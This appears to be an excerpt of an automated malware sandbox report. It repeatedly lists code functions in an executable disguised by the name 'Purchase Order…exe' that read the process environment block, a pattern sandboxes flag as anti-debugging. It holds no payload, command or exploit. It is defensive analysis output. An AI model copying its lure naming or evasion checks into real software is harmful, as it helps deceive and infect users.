      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348B678E mov eax, dword ptr fs:[00000030h]5_2_348B678E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348CF78A mov eax, dword ptr fs:[00000030h]5_2_348CF78A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348997A9 mov eax, dword ptr fs:[00000030h]5_2_348997A9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489F7AF mov eax, dword ptr fs:[00000030h]5_2_3489F7AF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489F7AF mov eax, dword ptr fs:[00000030h]5_2_3489F7AF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489F7AF mov eax, dword ptr fs:[00000030h]5_2_3489F7AF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489F7AF mov eax, dword ptr fs:[00000030h]5_2_3489F7AF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489F7AF mov eax, dword ptr fs:[00000030h]5_2_3489F7AF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348107AF mov eax, dword ptr fs:[00000030h]5_2_348107AF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483D7B0 mov eax, dword ptr fs:[00000030h]5_2_3483D7B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E37B6 mov eax, dword ptr fs:[00000030h]5_2_348E37B6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F7BA mov eax, dword ptr fs:[00000030h]5_2_3480F7BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F7BA mov eax, dword ptr fs:[00000030h]5_2_3480F7BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F7BA mov eax, dword ptr fs:[00000030h]5_2_3480F7BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F7BA mov eax, dword ptr fs:[00000030h]5_2_3480F7BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F7BA mov eax, dword ptr fs:[00000030h]5_2_3480F7BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F7BA mov eax, dword ptr fs:[00000030h]5_2_3480F7BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F7BA mov eax, dword ptr fs:[00000030h]5_2_3480F7BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F7BA mov eax, dword ptr fs:[00000030h]5_2_3480F7BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F7BA mov eax, dword ptr fs:[00000030h]5_2_3480F7BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481C7C0 mov eax, dword ptr fs:[00000030h]5_2_3481C7C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348157C0 mov eax, dword ptr fs:[00000030h]5_2_348157C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348157C0 mov eax, dword ptr fs:[00000030h]5_2_348157C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348157C0 mov eax, dword ptr fs:[00000030h]5_2_348157C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348907C3 mov eax, dword ptr fs:[00000030h]5_2_348907C3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481D7E0 mov ecx, dword ptr fs:[00000030h]5_2_3481D7E0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489E7E1 mov eax, dword ptr fs:[00000030h]5_2_3489E7E1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348117EC mov eax, dword ptr fs:[00000030h]5_2_348117EC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348117EC mov eax, dword ptr fs:[00000030h]5_2_348117EC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348117EC mov eax, dword ptr fs:[00000030h]5_2_348117EC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348147FB mov eax, dword ptr fs:[00000030h]5_2_348147FB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348147FB mov eax, dword ptr fs:[00000030h]5_2_348147FB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34817703 mov eax, dword ptr fs:[00000030h]5_2_34817703
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34815702 mov eax, dword ptr fs:[00000030h]5_2_34815702
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34815702 mov eax, dword ptr fs:[00000030h]5_2_34815702
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484C700 mov eax, dword ptr fs:[00000030h]5_2_3484C700
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34810710 mov eax, dword ptr fs:[00000030h]5_2_34810710
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34840710 mov eax, dword ptr fs:[00000030h]5_2_34840710
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484F71F mov eax, dword ptr fs:[00000030h]5_2_3484F71F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484F71F mov eax, dword ptr fs:[00000030h]5_2_3484F71F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34813720 mov eax, dword ptr fs:[00000030h]5_2_34813720
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482F720 mov eax, dword ptr fs:[00000030h]5_2_3482F720
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482F720 mov eax, dword ptr fs:[00000030h]5_2_3482F720
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482F720 mov eax, dword ptr fs:[00000030h]5_2_3482F720
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348CF72E mov eax, dword ptr fs:[00000030h]5_2_348CF72E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484C720 mov eax, dword ptr fs:[00000030h]5_2_3484C720
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484C720 mov eax, dword ptr fs:[00000030h]5_2_3484C720
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D972B mov eax, dword ptr fs:[00000030h]5_2_348D972B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34809730 mov eax, dword ptr fs:[00000030h]5_2_34809730
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34809730 mov eax, dword ptr fs:[00000030h]5_2_34809730
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34845734 mov eax, dword ptr fs:[00000030h]5_2_34845734
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482B730 mov ecx, dword ptr fs:[00000030h]5_2_3482B730
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482B730 mov eax, dword ptr fs:[00000030h]5_2_3482B730
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482B730 mov eax, dword ptr fs:[00000030h]5_2_3482B730
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482B730 mov eax, dword ptr fs:[00000030h]5_2_3482B730
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482B730 mov eax, dword ptr fs:[00000030h]5_2_3482B730
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348EB73C mov eax, dword ptr fs:[00000030h]5_2_348EB73C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348EB73C mov eax, dword ptr fs:[00000030h]5_2_348EB73C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348EB73C mov eax, dword ptr fs:[00000030h]5_2_348EB73C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348EB73C mov eax, dword ptr fs:[00000030h]5_2_348EB73C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484273C mov eax, dword ptr fs:[00000030h]5_2_3484273C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484273C mov ecx, dword ptr fs:[00000030h]5_2_3484273C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484273C mov eax, dword ptr fs:[00000030h]5_2_3484273C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3488C730 mov eax, dword ptr fs:[00000030h]5_2_3488C730
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E3749 mov eax, dword ptr fs:[00000030h]5_2_348E3749
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484674D mov esi, dword ptr fs:[00000030h]5_2_3484674D
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484674D mov eax, dword ptr fs:[00000030h]5_2_3484674D
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484674D mov eax, dword ptr fs:[00000030h]5_2_3484674D
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34810750 mov eax, dword ptr fs:[00000030h]5_2_34810750
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489E75D mov eax, dword ptr fs:[00000030h]5_2_3489E75D
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348B375F mov eax, dword ptr fs:[00000030h]5_2_348B375F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348B375F mov eax, dword ptr fs:[00000030h]5_2_348B375F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348B375F mov eax, dword ptr fs:[00000030h]5_2_348B375F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348B375F mov eax, dword ptr fs:[00000030h]5_2_348B375F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348B375F mov eax, dword ptr fs:[00000030h]5_2_348B375F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852750 mov eax, dword ptr fs:[00000030h]5_2_34852750
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852750 mov eax, dword ptr fs:[00000030h]5_2_34852750
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34894755 mov eax, dword ptr fs:[00000030h]5_2_34894755
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480B765 mov eax, dword ptr fs:[00000030h]5_2_3480B765
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480B765 mov eax, dword ptr fs:[00000030h]5_2_3480B765
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480B765 mov eax, dword ptr fs:[00000030h]5_2_3480B765
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480B765 mov eax, dword ptr fs:[00000030h]5_2_3480B765
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34818770 mov eax, dword ptr fs:[00000030h]5_2_34818770
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820770 mov eax, dword ptr fs:[00000030h]5_2_34820770
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820770 mov eax, dword ptr fs:[00000030h]5_2_34820770
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820770 mov eax, dword ptr fs:[00000030h]5_2_34820770
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820770 mov eax, dword ptr fs:[00000030h]5_2_34820770
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820770 mov eax, dword ptr fs:[00000030h]5_2_34820770
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820770 mov eax, dword ptr fs:[00000030h]5_2_34820770
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820770 mov eax, dword ptr fs:[00000030h]5_2_34820770
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820770 mov eax, dword ptr fs:[00000030h]5_2_34820770
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820770 mov eax, dword ptr fs:[00000030h]5_2_34820770
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820770 mov eax, dword ptr fs:[00000030h]5_2_34820770
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820770 mov eax, dword ptr fs:[00000030h]5_2_34820770
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820770 mov eax, dword ptr fs:[00000030h]5_2_34820770
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489D080 mov eax, dword ptr fs:[00000030h]5_2_3489D080
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489D080 mov eax, dword ptr fs:[00000030h]5_2_3489D080
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481208A mov eax, dword ptr fs:[00000030h]5_2_3481208A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480D08D mov eax, dword ptr fs:[00000030h]5_2_3480D08D
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483D090 mov eax, dword ptr fs:[00000030h]5_2_3483D090
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483D090 mov eax, dword ptr fs:[00000030h]5_2_3483D090
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34815096 mov eax, dword ptr fs:[00000030h]5_2_34815096
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484909C mov eax, dword ptr fs:[00000030h]5_2_3484909C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A80A8 mov eax, dword ptr fs:[00000030h]5_2_348A80A8
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D60B8 mov eax, dword ptr fs:[00000030h]5_2_348D60B8
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D60B8 mov ecx, dword ptr fs:[00000030h]5_2_348D60B8
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3488D0C0 mov eax, dword ptr fs:[00000030h]5_2_3488D0C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3488D0C0 mov eax, dword ptr fs:[00000030h]5_2_3488D0C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348920DE mov eax, dword ptr fs:[00000030h]5_2_348920DE
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E50D9 mov eax, dword ptr fs:[00000030h]5_2_348E50D9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348390DB mov eax, dword ptr fs:[00000030h]5_2_348390DB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480A0E3 mov ecx, dword ptr fs:[00000030h]5_2_3480A0E3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348350E4 mov eax, dword ptr fs:[00000030h]5_2_348350E4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348350E4 mov ecx, dword ptr fs:[00000030h]5_2_348350E4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348180E9 mov eax, dword ptr fs:[00000030h]5_2_348180E9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348960E0 mov eax, dword ptr fs:[00000030h]5_2_348960E0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480C0F0 mov eax, dword ptr fs:[00000030h]5_2_3480C0F0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348520F0 mov ecx, dword ptr fs:[00000030h]5_2_348520F0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34894000 mov ecx, dword ptr fs:[00000030h]5_2_34894000
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348B2000 mov eax, dword ptr fs:[00000030h]5_2_348B2000
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348B2000 mov eax, dword ptr fs:[00000030h]5_2_348B2000
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348B2000 mov eax, dword ptr fs:[00000030h]5_2_348B2000
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348B2000 mov eax, dword ptr fs:[00000030h]5_2_348B2000
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348B2000 mov eax, dword ptr fs:[00000030h]5_2_348B2000
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348B2000 mov eax, dword ptr fs:[00000030h]5_2_348B2000
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348B2000 mov eax, dword ptr fs:[00000030h]5_2_348B2000
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348B2000 mov eax, dword ptr fs:[00000030h]5_2_348B2000
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482E016 mov eax, dword ptr fs:[00000030h]5_2_3482E016
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482E016 mov eax, dword ptr fs:[00000030h]5_2_3482E016
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482E016 mov eax, dword ptr fs:[00000030h]5_2_3482E016
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482E016 mov eax, dword ptr fs:[00000030h]5_2_3482E016
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480A020 mov eax, dword ptr fs:[00000030h]5_2_3480A020
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480C020 mov eax, dword ptr fs:[00000030h]5_2_3480C020
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D903E mov eax, dword ptr fs:[00000030h]5_2_348D903E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D903E mov eax, dword ptr fs:[00000030h]5_2_348D903E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D903E mov eax, dword ptr fs:[00000030h]5_2_348D903E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D903E mov eax, dword ptr fs:[00000030h]5_2_348D903E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A6030 mov eax, dword ptr fs:[00000030h]5_2_348A6030
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34812050 mov eax, dword ptr fs:[00000030h]5_2_34812050
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483B052 mov eax, dword ptr fs:[00000030h]5_2_3483B052
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34896050 mov eax, dword ptr fs:[00000030h]5_2_34896050
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489106E mov eax, dword ptr fs:[00000030h]5_2_3489106E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E5060 mov eax, dword ptr fs:[00000030h]5_2_348E5060
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483C073 mov eax, dword ptr fs:[00000030h]5_2_3483C073
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34821070 mov eax, dword ptr fs:[00000030h]5_2_34821070
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34821070 mov ecx, dword ptr fs:[00000030h]5_2_34821070
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34821070 mov eax, dword ptr fs:[00000030h]5_2_34821070
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34821070 mov eax, dword ptr fs:[00000030h]5_2_34821070
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34821070 mov eax, dword ptr fs:[00000030h]5_2_34821070
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34821070 mov eax, dword ptr fs:[00000030h]5_2_34821070
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34821070 mov eax, dword ptr fs:[00000030h]5_2_34821070
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34821070 mov eax, dword ptr fs:[00000030h]5_2_34821070
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34821070 mov eax, dword ptr fs:[00000030h]5_2_34821070
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34821070 mov eax, dword ptr fs:[00000030h]5_2_34821070
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34821070 mov eax, dword ptr fs:[00000030h]5_2_34821070
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34821070 mov eax, dword ptr fs:[00000030h]5_2_34821070
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34821070 mov eax, dword ptr fs:[00000030h]5_2_34821070
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3488D070 mov ecx, dword ptr fs:[00000030h]5_2_3488D070
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34850185 mov eax, dword ptr fs:[00000030h]5_2_34850185
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348CC188 mov eax, dword ptr fs:[00000030h]5_2_348CC188
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348CC188 mov eax, dword ptr fs:[00000030h]5_2_348CC188
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348B4180 mov eax, dword ptr fs:[00000030h]5_2_348B4180
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348B4180 mov eax, dword ptr fs:[00000030h]5_2_348B4180
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489019F mov eax, dword ptr fs:[00000030h]5_2_3489019F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489019F mov eax, dword ptr fs:[00000030h]5_2_3489019F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489019F mov eax, dword ptr fs:[00000030h]5_2_3489019F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489019F mov eax, dword ptr fs:[00000030h]5_2_3489019F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34867190 mov eax, dword ptr fs:[00000030h]5_2_34867190
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480A197 mov eax, dword ptr fs:[00000030h]5_2_3480A197
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480A197 mov eax, dword ptr fs:[00000030h]5_2_3480A197
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480A197 mov eax, dword ptr fs:[00000030h]5_2_3480A197
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E21AE mov eax, dword ptr fs:[00000030h]5_2_348E21AE
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C11A4 mov eax, dword ptr fs:[00000030h]5_2_348C11A4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C11A4 mov eax, dword ptr fs:[00000030h]5_2_348C11A4
